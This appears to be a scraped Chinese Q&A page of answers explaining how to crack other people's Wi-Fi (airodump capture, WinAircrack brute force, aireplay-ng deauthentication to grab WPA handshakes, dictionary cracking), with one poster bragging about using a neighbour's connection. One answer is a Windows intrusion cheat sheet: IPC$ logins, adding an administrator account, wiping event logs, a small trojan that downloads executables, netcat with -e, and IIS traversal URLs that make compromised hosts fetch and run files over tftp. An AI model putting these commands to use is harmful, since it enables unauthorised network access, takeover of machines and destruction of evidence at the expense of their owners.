key...”按钮,winaircrack会自动根据softer.cap中保存的统计信息进行分析,暴力破解WEP密文。第七步:由于采取的是暴力破解方法,所以花费的时间会比较多,大概需要几个小时甚至更多的时间来破解一个64位的WEP密文。当发现WEP密文后会显示出内容.不过在实际操作过程中需要的时间会比较长,特别是当WEP密文设置的比较复杂时,例如使用多个数字或者增加加密位数达到128位等。另外通过airodump来收集无线数据传输包也是关键,也许对方开着路由器但并没有和网卡进行大流量数据传输,这样即使你开启airodump收集了几个小时,都可能出现无法获得足够数据包问题。仅仅是为了和大家交流,希望大家不要使用本文介绍的方法去入侵别人的无线网,大家能够明白WEP加密也不是百分之百安全,所以应该尽量使用WPA安全加密方式。--------------------------------------------------------------------------------无线网络密码破解面的工具可以帮助你。你有点电脑基础的话,很容易搞到密码的。Kismet:一款超强的无线嗅探器 NetStumbler:免费的Windows 802.11嗅探器 GFI LANguard:一款Windows平台上的商业网络安全扫描器 Airsnort:802.11 WEP加密破解工具 无非是扫描 嗅探 破解与远程主机建立空管连接) net use \IP地址ipc$ "" /use:"" (以管理员身份登录远程主机) net use \IP地址ipc$ "密码" /use:"Administrator" (传送文件到远程主机WINNT目录下)copy 本机目录路径程序 \IP地址admin$ (查看远程主机时间) net time \IP地址 (定时启动某个程序) at \IP地址 02:18 readme.exe (查看共享) net view \IP地址 (查看netbios工作组列表) nbtstat -A IP地址 (将远程主机C盘映射为自己的F盘) net use f: \IP地址c$ ""/user:"Administrator" (这两条把自己增加到管理员组): net user 用户名 密码 /add net localgroup Administrators 用户名 /add (断开连接) net use \IP地址ipc$ /delete ===================================================== 擦屁屁: del C:winntsystem32logfiles*.* del C:winntsystem32config*.evt del C:winntsystem32dtclog*.* del C:winntsystem32*.log del C:winntsystem32*.txt del C:winnt*.txt del C:winnt*.log ============================ 一、netsvc.exe 下面的命令分别是列出主机上的服务项目、查寻和远程启动主机的“时间任务”服务: netsvc /list \IP地址 netsvc schedule \IP地址 /query netsvc \IP地址 schedule /start 二、OpenTelnet.exe 远程启动主机的Telnet服务,并绑定端口到7878,例如: OpenTelnet \IP地址 用户名 密码 1 7878 然后就可以telnet到主机的7878端口,进入DOS方式下: telnet IP地址 7878 三、winshell.exe 一个非常小的木马(不到6K),telnet到主机的7878端口,输入密码winshell,当看到CMD>后,可打下面的命令: p Path (查看winshell主程序的路径信息) b reBoot (重新启动机器) d shutDown (关闭机器) s Shell (执行后你就会看到可爱的“C:>”) x eXit (退出本次登录会话,此命令并不终止winshell的运行) CMD> http://.../srv.exe (通过http下载其他网站上的文件到运行winshell的机器上) 四、3389登陆器,GUI方式登录远程主机的 五、elsave.exe 事件日志清除工具 elsave -s \IP地址 -l "application" -C elsave -s \IP地址 -l "system" -C elsave -s \IP地址 -l "security" -C 执行后成功清除应用程序日志,系统日志,安全日志 六、hbulot.exe 开启win2kserver和winxp的3389服务 hbulot [/r] 使用/r表示安装完成后自动重起目标使设置生效。 七、nc.exe(netcat.exe) 一个很好的工具,一些脚本程序都要用到它,也可做溢出后的连接用。 想要连接到某处: nc [-options] hostname port[s] [ports] ... 绑定端口等待连接: nc -l -p port [-options] [hostname] [port] 参数: -e prog 程序重定向,一旦连接,就执行 [危险!!] -g gateway source-routing hop point[s], up to 8 -G num source-routing pointer: 4, 8, 12, ... -h 帮助信息 -i secs 延时的间隔 -l 监听模式,用于入站连接 -n 指定数字的IP地址,不能用hostname -o file 记录16进制的传输 -p port 本地端口号 -r 任意指定本地及远程端口 -s addr 本地源地址 -u UDP模式 -v 详细输出——用两个-v可得到更详细的内容 -w secs timeout的时间 -z 将输入输出关掉——用于扫描时 八、TFTPD32.EXE 把自己的电脑临时变为一台FTP服务器,让肉鸡来下载文件,tftp命令要在肉鸡上执行,通常要利用Unicode漏洞或telnet到肉鸡,例如: http://IP地址/s cripts/..%255c..%255c/winnt/system32/cmd.exe?/c tftp -i 本机IP地址 get 文件名 c:winntsystem32文件名 然后可以直接令文件运行: http://IP地址/s cripts/..%255c..%255c/winnt/system32/cmd.exe?/c+文件名 九、 prihack.exe是IIS的printer远程缓冲区溢出工具。idqover.exe是溢出idq的,选择“溢出后在一个端口监听”,然后用 telnet连接它的监听端口,如果溢出成功,一连它的端口,绑定的命令马上执行。xploit.exe是一个图形界面的ida溢出,成功以后winxp 下需要打winxp。 一○、ntis.exe、cmd.exe和cmdasp.asp是三个cgi-backdoor,exe要放到cgi-bin目录下,asp放到有ASP执行权限的目录。然后用IE浏览器连接。 一、一 Xscan命令行运行参数说明: 在检测过程中,按"[空格]"键可以查看各线程状态及扫描进度,按"q"键保存当前数据后提前退出程序,按""强行关闭程序。 1.命令格式: xscan -host [-] [其他选项] xscan -file [其他选项]其中 含义如下: -port : 检测常用服务的端口状态(可通过datconfig.ini文件的"PORT-SCAN-OPTIONSPORT-LIST"项定制待检测端口列表); -ftp : 检测FTP弱口令(可通过datconfig.ini文件设置用户名/密码字典文件); -ntpass : 检测NT-Server弱口令(可通过datconfig.ini文件设置用户名/密码字典文件); -cgi : 检测CGI漏洞(可通过datconfig.ini文件的"CGI-ENCODEencode_type"项设置编码方案); -iis : 检测IIS漏洞(可通过datconfig.ini文件的"CGI-ENCODEencode_type"项设置编码方案); [其他选项] 含义如下: -v: 显示详细扫描进度 -p: 跳过Ping不通的主机 -o: 跳过没有检测到开放端口的主机 -t : 指定最大并发线程数量和并发主机数量, 默认数量为100,10采纳我吧 谢谢2023-08-09 19:12:213
如何快速获取握手包?
获得WPAWPA2 握手包的方法有很多,下面介绍通过aircrack-ng工具包来载获握手数据包。1、下载aircrack-ng工具包。2、终端里输入 sudo airomon-ng stat wlan0 启动数据监控模式。3、终端里输入 sudo airodump -w wpa mon0 ( 此时监控端口应该为 mon0 ,DATA保存到以wpa命名的文件中了)。这时大家就可以看到要抓包的AP DATA为0 4、依次:网络连接图标->点鼠标左键->鼠标移到要抓取握手数据包的AP上面点左键->。5、这时AP会提示你填入密码,随便填几个数字或字母进去(注:但必需是八位,如:AAAAAAAA OR 88888888),然后点击连接。6、现在可以看到网络连接正在尝试连接无线AP,回头看下步骤3的终端,DATA已经变为4个了。7、再打开一个新的终端,输入 sudo aircrack-ng wpa*.cap 会看到里面有一个握手包了。就是这么简单的了~!希望对你能有所帮助。2023-08-09 19:12:291
TP-LINKTl-620G无线USB网卡如何破解加密网络
无线网络密码破解2008-08-15 16:53需要WinAircrackPack该工具包是一个无线工具的组合包,包括WinAircrack.exe,wzcook.exe,airdecap.exe以及airodump.exe四个程序,这些程序各有各的用。SSID号发现工具就是airodump.exe。对付 SSID影藏第一步:解压缩下载的工具包,运行里头的airodump.exe第二步:选择相应的网卡,输入对应无线网卡前的序号第三步:输入o或者a选择网卡模式,第四步:选择搜索频段,输入0是代表所有频段都检测的意思。第五步:接下来会提示你输入一个保存文件,这样该工具会把所有sniffer下来的数据包放到这个文件中第六步:only write wep ivs是否只检测WEP加密数据包,我们选择“Y”即可。第七步:这时会出现一个提示,大概意思就是说目前驱动还不支持,无法进行sniffer的操作。同时浏览器会自动转到一个页面,我们可以通过这个页面下载兼容驱动程序,升级我们的无线网卡让sniffer工具——airodump.exe可以顺利运行(2)下载无线网卡新驱动: 要想下载合适的无线网卡新驱动就需要到前面提到的那个跳转页面了。第一步:打开的页面地址为http://www.wildpackets.com/support/product_support/airopeek/hardware,我们通过这个地址下载适合自己网卡的可以使用airodump的驱动。第二步:在搜索设备页面中选择自己无线网卡的品牌和型号。笔者选择tp-link的所有无线产品进行查询,看看应该下载哪个驱动第三步:在查询结果页面中我们可以看到自己的网卡应该使用该站点提供的AR5005G驱动来使用airodump四步:再次返回http://www.wildpackets.com/support/product_support/airopeek/hardware页面,你会在该页内容上看到关于该驱动所兼容的atheros卡型号,里面会提到ar5005,虽然我们的是ar5005g但是可以使用。点该页面下方的the wildpackets atheros wireless driver v4.2链接进行下载即可第五步:下载wildpackets atheros wireless driver v4.2驱动到本地硬盘。第六步:打开后里面有三个文件,我们的无线网卡升级工作就要靠这三个文件。(3)安装无线网卡新驱动: 之前下载的wildpackets atheros wireless driver v4.2压缩包里的三个文件就是我们安装驱动的主角。第一步:在桌面网上邻居图标上点鼠标右键,并选择属性。第二步:在自己的无线网卡对应的本地连接上点鼠标右键,并选择属性。第三步:在无线网络连接属性窗口中的“常规”标签下点网卡信息旁边的“配置”按钮。第四步:在“驱动程序”标签中点“更新驱动程序”按钮。第五步:系统将出现硬件安装向导,我们选择“从列表或指定位置安装(高级),然后点“下一步”按钮第六步:然后选择“不要搜索,我要自己选择要安装的驱动程序”,点“下一步”按钮继续。七步:由于之前我们安装的驱动是*****无线网卡的官方驱动,所以系统默认会找到相应的驱动,我们不选择他们,点“从磁盘安装”。第八步:通过“浏览”按钮找到我们下载并解压缩的wildpackets atheros wireless driver v4.2文件保存目录。第九步:选择atheros ar5005g cardbus wireless network adapter,点“下一步”继续第十步:在安装驱动过程中会出现兼容性提示,我们点“仍然继续”即可。第十一步:系统复制必须文件到本地磁盘第十二步:完成硬件更新向导,我们的TP-LINK无线网卡现在已经变成了atheros ar5005g无线网卡了,这样才能够使用airodump这个无线网络sniffer工具。四、总 结:由于WEP破解的准备工作比较多,已经成功的将自己的网卡进行了更新驱动工作,这也是WEP加密破解的关键,开始 轻松破解无线网络WEP一、使用airodump抓取无线网络数据包并破解SSID名称:不管是找出已经禁用了SSID号广播的无线网络还是进行WEP解密工作,我们首先要做的就是通过无线网络sniffer工具——airodump来监视无线网络中的数据包。第一步:打开文章中下载的winaircrackpack压缩包解压缩的目录。第二步:运行airodump.exe程序,这个就是我们的sniffer小工具,他的正常运行是建立在我们无线网卡已经更新驱动的基础上。第三步:这时你会发现显示的信息和安装驱动前已经不同了,我们的***网卡名称已经变为13 atheros ar5005g cardbus wireless network adapter,也就是说他成功更新为与atheros兼容的硬件了。我们输入其前面的数字13即可。第四步:接下来是选择无线网卡的类型,既然说了是与atheros相兼容的,所以直接输入“a”进行选择即可。第五步:上面文章中提到了已经把无线网络的SSID广播功能取消了,这样我们假设还不知道该无线设备使用的哪个频段和SSID号。在这里输入0,这样将检测所有频段的无线数据包。实际上要想知道一个无线网络使用的频段是非常简单的,可以使用无线网卡管理配置工具,就像上文提到的那样,可以知道该无线网络使用的速度和频段,但是无法检测出SSID号。第六步:同样输入一个保存数据包信息的文件,例如输入softer。这样可以把检测到的数据包以及统计信息一起写到这个文件中,并为使用其他工具提供基础保证。第七步:是否只收集wep数据信息,我们点N”。这样将检测网络中的所有数据包不只WEP加密数据。第八步:最后airodump会自动检测网络中的所有频段,对无线网络中的无线数据包进行统计和分析。第九步:当统计的数据包比较多的时候,就可以自动分析出无线网络对应的SSID号和无线设备的MAC地址以及无线速度,发射频段和是否加密,采用何种方式加密了,是不是非常神气?例如设置的无线网络SSID号为softer,刚开始图7中统计时还没有检测出来,当数据达到一定数量后例如DATA处为15651时就可以看到ESSID号即SSID号为softer了。至此我们成功的实现了通过airodump找到没有开启SSID广播功能的无线网络对应的SSID号,所以说仅仅报着将SSID号隐藏并修改默认名字是不能阻止非法入侵者连接无线网络的。不管你是否开启SSID广播,我们都可以通过无线网络的sniffer工具来找出你的真实SSID名称。不过有一点要特别注意,那就是是否能够破解SSID名称是建立在airodump搜集到足够的数据包基础上的,也就是说也可能你的无线路由器开着,但是没有任何无线网卡和他通讯,这样airodump是无法检测到任何无线数据包并进行分析破解的。笔者在写本文进行的实验环境也是如此,那另外一块TP-LINK无线网卡510G安装在一台联想笔记本上并不停的通过无线路由器进行BT下载来保持总是不断有无线数据传输,这样才可以加快破解进程。另外当数据包没有收集足够多的情况下,airodump会出现错误信息,例如本来是WEP加密方式的无线网络,可能会检测为WPA。用户只需要多等些时间让airodump收集足够多的数据就可以保证显示结果的真实性了。二、使用WinAircrack破解WEP密文:虽然我们可以通过airodump来检测无线网络的基本信息,包括发射频段,无线网络的SSID名称,无线速度等。但是对于那些使用WEP加密了的无线网络就无能为力了,即使我们知道了无线网络的SSID号如果没有WEP加密密文的话,依然无法连接到该网络。不过airodump收集到的信息也是非常宝贵的,我们可以通过另外一个工具来分析出WEP密文。该工具的名称是WinAircrack,当然在用WinAircrack破解airodump收集到的信息前一定保证airodump收集的信息量要大,信息越多破解越不容易出问题,而且破解成功所需时间越短。第一步:打开下载的压缩包,运行里面的winaircrack.exe程序。第二步:在左边找到general,接下来点GENERAL界面中下方的click here to locate capture file...,让我们选择一个捕获文件。第三步:这个文件就是上面所提到的airodump保存下来的数据统计文件,第九步中已经为其起了一个名字叫softer了,那么我们到airodump.exe所在文件夹中找到softer.cap文件,这个文件就是捕获文件。第四步:回到general界面,在encryption type处选择WEP。第五步:在左边点WEP,在WEP设置标签中先检测64位密文,key index保持自动AUTO。因为大部分用户在设置无线路由器WEP加密时都选择了最简单的64位密文,他也是破解所需时间最短的。第六步:设置完毕点右下角的“aircrack the key...”按钮,winaircrack会自动根据softer.cap中保存的统计信息进行分析,暴力破解WEP密文。第七步:由于采取的是暴力破解方法,所以花费的时间会比较多,大概需要几个小时甚至更多的时间来破解一个64位的WEP密文。当发现WEP密文后会显示出内容.不过在实际操作过程中需要的时间会比较长,特别是当WEP密文设置的比较复杂时,例如使用多个数字或者增加加密位数达到128位等。另外通过airodump来收集无线数据传输包也是关键,也许对方开着路由器但并没有和网卡进行大流量数据传输,这样即使你开启airodump收集了几个小时,都可能出现无法获得足够数据包问题。仅仅是为了和大家交流,希望大家不要使用本文介绍的方法去入侵别人的无线网,大家能够明白WEP加密也不是百分之百安全,所以应该尽量使用WPA安全加密方式2023-08-09 19:12:362
用什么软件可以打开握手包
打开握手包的软件有:科来、sniffer、wireshark等等。握手包获得方式:如果是抓自己的数据包,在本机上装上抓包软件就行了。如果要是抓网络中的,则需要在相应的交换机上做镜像就可以。具体抓包方法:1、打开水滴-S扫描-信号后面MAC有客户端直接点右边L启动(若没有客户端也可以点L启动,程序就等待客户端出现为止)-攻击客户端以获得握手包,选择词典。2、默认wordlist.txt,选择OK-开始跑词典破密码(这个自带词典可能会跑出密码会提示发现WAP密码,也有可能跑不出密码会提示在字典中没有发现密码)。3、提示拷贝握手包文件到硬盘分区,直接按取消-插上U盘,在虚拟机菜单栏,选择虚拟机-可移动磁盘-选择U盘usb2.0与主机,连接或断开连接(就是把U盘加载到虚拟机里面)-在虚拟机桌面打开home-文件系统-tmp-找到XXXXXX_handshake.cap文件-右击发送至你的U盘里面。在XP系统下面使用EWSA软件导入握手包.cap文件等待漫长的跑字典PJ密码即可。2023-08-09 19:12:456
刚搬到一个新地方用本本收到几个无线信号,信号很好,而且没设置密码,联接后发现无网络服务,很郁闷。
无线路由器WEP加密破解![size=4]今天闲来无事,无意中间打开了笔记本的无线开关,呵呵,居然看到有无线网络的信号,仔细一看,居然信号还是满格,不过加了密码。呵呵,有戏了,今天就拿它练练手,看看能不能突破无线密码,用用邻居的网络信号!于是搜集器材,翻出2年前的一个TP--Link PC卡式无线网卡,下载了几个软件,开始破解之旅。不到半小时,邻居的WEP密码已经出现在我的电脑屏幕上。呵呵,现在就是用邻居的无线信号给大家讲讲我的破解过程,也请使用无线的朋友们注意了!!小心你的无线。[/size][color=red][size=5]首先说明下,破解无线网络的密码是可行的,但是是违法的,所以本贴的宗旨是提醒大家注意自己的无线网络安全。也希望大家不要利用本贴的方法干违法犯罪的事情!!!!基于此理由,我没有提供所用到的软件的下载,请大家谅解![/size][/color]首先器材要求:无线网卡必须是采用Atheros AR5001, AR5002, AR5004, AR5005 或 AR5006芯片组芯片,或者能使用Atheros 兼容驱动的无线网卡。所以基本上迅驰的机型不能使用此方法,只能使用在Lunix下的方法破解!下载以下软件:1、WinAirCrackPack工具包(WinAirCrackPack工具包是一款无线局域网扫描和密钥破解工具,主要包括airodump和aircrack等工具。它可以监视无线网络中传输的数据,收集数据包,并能计算出WEP/WPA密钥。我们用它来抓包和暴力破解密码)2、Network Stumbler(无线网络信号搜索软件,可以搜索到隐藏了SSID的AP。用来搜索周围区域内的无线信号)下面进入实战:1、安装好无线网卡的驱动并禁用或者取下机器上的其它的无线网卡。2、安装Network Stumbler软件,打开Network Stumbler,等几分钟后就可以看见所有的区域中工作中的无线AP,记录下MAC地址,SSID,信道(chan),是否加密(Encryption)[如果未加密就不需要破解了]。3、下面再解压缩下载下来的WinAirCrackPack工具包。可以看到如下文件:4、运行里头的airodump.exe,选择相应的网卡,输入对应无线网卡前的序号,例如我的是13。5、输入o或者a选择网卡芯片类型,根据你的芯片类型选择,如果是使用兼容驱动的话选择a。再选择搜索频段,输入0是代表所有频段都检测的意思。接下来会提示你输入一个保存文件,这样该工具会把所有sniffer下来的数据包放到这个文件中。随便建立一个就好了。6、only write wep ivs是否只检测WEP加密数据包,我们选择“Y”即可。7、如果出现下图的结果,那么说明你的网卡驱动不支持此程序,同时会自动打开浏览器让你选择合适的驱动。8、在安装好合适的驱动后会出现下图:9、当统计的数据包比较多的时候,就可以自动分析出无线网络对应的SSID号和无线设备的MAC地址以及无线速度,发射频段和是否加密,采用何种方式加密了。10、我们成功的实现了通过airodump找到没有开启SSID广播功能的无线网络对应的SSID号,所以说仅仅报着将SSID号隐藏并修改默认名字是不能阻止非法入侵者连接无线网络的。不管你是否开启SSID广播,我们都可以通过无线网络的sniffer工具来找出你的真实SSID名称。然后再对照第二步中获得的MAC地址和SSID是不是正确。 不过有一点要特别注意,那就是是否能够破解SSID名称是建立在airodump搜集到足够的数据包基础上的,也就是说也可能你的无线路由器开着,但是没有任何无线网卡和他通讯,这样airodump是无法检测到任何无线数据包并进行分析破解的。11、再运行WinAirCrackPack工具包里面的winaircrack.exe程序。12、在左边找到general,接下来点GENERAL界面中下方的click here to locate capture file...,让我们选择一个捕获文件。13、这个文件就是上面所提到的airodump保存下来的数据统计文件,前面已经为其起了一个名字叫softer了,那么我们到airodump.exe所在文件夹中找到softer.cap文件,这个文件就是捕获文件。14、回到general界面,在encryption type处选择WEP。15、在左边点WEP,在WEP设置标签中先检测64位密文,key index保持自动AUTO。因为大部分用户在设置无线路由器WEP加密时都选择了最简单的64位密文,他也是破解所需时间最短的。16、设置完毕点右下角的“aircrack the key...”按钮,winaircrack会自动根据softer.cap中保存的统计信息进行分析,暴力破解WEP密文。17、由于采取的是暴力破解方法,所以花费的时间会比较多,大概需要几个小时甚至更多的时间来破解一个64位的WEP密文。当发现WEP密文后会显示出内容,如下图就能够发现出WEP加密信息为1111122222。 以上的内容是我网上帮你转摘过来的。不过本人也曾经试过,由于网卡不支持,还是不了了之,后来没辙,在淘宝上发了我150个大洋,买了个卡皇,按自带的光盘步骤,大都被破解了。哈哈。。。。我现在也省了宽带包年费,爽!!!2023-08-09 19:13:103
disk3.0是什么
disk3是一款无线局域网扫描和密钥破解工具的软件,disk3这款软件主要包括airodump和aircrack等等工具,可以监视无线网络中传输的数据,收集数据包,并能计算出wep和wpa密钥,需要选用具有wep和wpa加密功能的无线路由器,带有迅驰无线网卡的笔记本电脑就可以了。2023-08-09 19:13:171
抓到握手包,连接显示密码错误,怎么办?
握手包的抓取需要在用户正在拨号时才行。一般的方法是,在抓包的同时,用deauth攻击,让已经登录的用户断线,然后用户再次登录时就可以抓握手包了。不要一直攻击,否则合法用户连不上。当pwr显示的合法客户端的数值变为0时,表示他已经掉线了。这个过程需要多进行几次,得亲自盯着,靠全自动软件是不行的。sudo ifconfig wlan0sudo airmon-ng start wlan0sudo airodump-ng -w test mon0 -c 13在抓包的同时进行注入攻击sudo aireplay-ng -0 10 -a "bssid" mon0抓到握手包后,在airodump显示屏幕的右上角回有显示的,然后可以关闭无线网卡了,在本地用aircrack-ng,挂上字典,进行wpa-psk的破解。抓握手包只是万里长征的第一步,跑密码是真正的难题。2023-08-09 19:13:265
wLAN怎样才能才能破解?
首先说明下,破解无线网络的密码是可行的,但是是违法的,所以本贴的宗旨是提醒大家注意自己的无线网络安全。也希望大家不要利用本贴的方法干违法犯罪的事情!!!!基于此理由,我没有提供所用到的软件的下载,请大家谅解![/size][/color]首先器材要求:无线网卡必须是采用Atheros AR5001, AR5002, AR5004, AR5005 或 AR5006芯片组芯片,或者能使用Atheros 兼容驱动的无线网卡。所以基本上迅驰的机型不能使用此方法,只能使用在Lunix下的方法破解!下载以下软件:1、WinAirCrackPack工具包(WinAirCrackPack工具包是一款无线局域网扫描和密钥破解工具,主要包括airodump和aircrack等工具。它可以监视无线网络中传输的数据,收集数据包,并能计算出WEP/WPA密钥。我们用它来抓包和暴力破解密码)2、Network Stumbler(无线网络信号搜索软件,可以搜索到隐藏了SSID的AP。用来搜索周围区域内的无线信号)下面进入实战:1、安装好无线网卡的驱动并禁用或者取下机器上的其它的无线网卡。2、安装Network Stumbler软件,打开Network Stumbler,等几分钟后就可以看见所有的区域中工作中的无线AP,记录下MAC地址,SSID,信道(chan),是否加密(Encryption)[如果未加密就不需要破解了]。3、下面再解压缩下载下来的WinAirCrackPack工具包。可以看到如下文件:4、运行里头的airodump.exe,选择相应的网卡,输入对应无线网卡前的序号,例如我的是13。5、输入o或者a选择网卡芯片类型,根据你的芯片类型选择,如果是使用兼容驱动的话选择a。再选择搜索频段,输入0是代表所有频段都检测的意思。接下来会提示你输入一个保存文件,这样该工具会把所有sniffer下来的数据包放到这个文件中。随便建立一个就好了。6、only write wep ivs是否只检测WEP加密数据包,我们选择“Y”即可。7、如果出现下图的结果,那么说明你的网卡驱动不支持此程序,同时会自动打开浏览器让你选择合适的驱动。8、在安装好合适的驱动后会出现下图:9、当统计的数据包比较多的时候,就可以自动分析出无线网络对应的SSID号和无线设备的MAC地址以及无线速度,发射频段和是否加密,采用何种方式加密了。10、我们成功的实现了通过airodump找到没有开启SSID广播功能的无线网络对应的SSID号,所以说仅仅报着将SSID号隐藏并修改默认名字是不能阻止非法入侵者连接无线网络的。不管你是否开启SSID广播,我们都可以通过无线网络的sniffer工具来找出你的真实SSID名称。然后再对照第二步中获得的MAC地址和SSID是不是正确。 不过有一点要特别注意,那就是是否能够破解SSID名称是建立在airodump搜集到足够的数据包基础上的,也就是说也可能你的无线路由器开着,但是没有任何无线网卡和他通讯,这样airodump是无法检测到任何无线数据包并进行分析破解的。11、再运行WinAirCrackPack工具包里面的winaircrack.exe程序。12、在左边找到general,接下来点GENERAL界面中下方的click here to locate capture file...,让我们选择一个捕获文件。13、这个文件就是上面所提到的airodump保存下来的数据统计文件,前面已经为其起了一个名字叫softer了,那么我们到airodump.exe所在文件夹中找到softer.cap文件,这个文件就是捕获文件。14、回到general界面,在encryption type处选择WEP。15、在左边点WEP,在WEP设置标签中先检测64位密文,key index保持自动AUTO。因为大部分用户在设置无线路由器WEP加密时都选择了最简单的64位密文,他也是破解所需时间最短的。16、设置完毕点右下角的“aircrack the key...”按钮,winaircrack会自动根据softer.cap中保存的统计信息进行分析,暴力破解WEP密文。17、由于采取的是暴力破解方法,所以花费的时间会比较多,大概需要几个小时甚至更多的时间来破解一个64位的WEP密文。当发现WEP密文后会显示出内容,如下图就能够发现出WEP加密信息为1111122222。 以上的内容是我网上帮你转摘过来的。不过本人也曾经试过,由于网卡不支持,还是不了了之,后来没辙,在淘宝上发了我150个大洋,买了个卡皇,按自带的光盘步骤,大都被破解了。哈哈。。。。我现在也省了宽带包年费,爽!!!2023-08-09 19:13:425
如何捕获WPA四次握手包?
抓一次就可以了,beini蛮好用的。握手包有很多类型,ewsa也支持不同的包。2023-08-09 19:14:051
kali无线网卡怎样开启监听模式
kali无线网卡可通过以下方式开启监听模式:1、在设置监听模式前先输入airmon-ng check kill结束进程;2、载入网卡airmon-ng start wlan0(网卡名);3、电脑会自动创建一个 wlan0mon接口 ;4、建立监听 airodump-ng wlan0mon,即可完成kali无线网卡开启监听模式。2023-08-09 19:15:081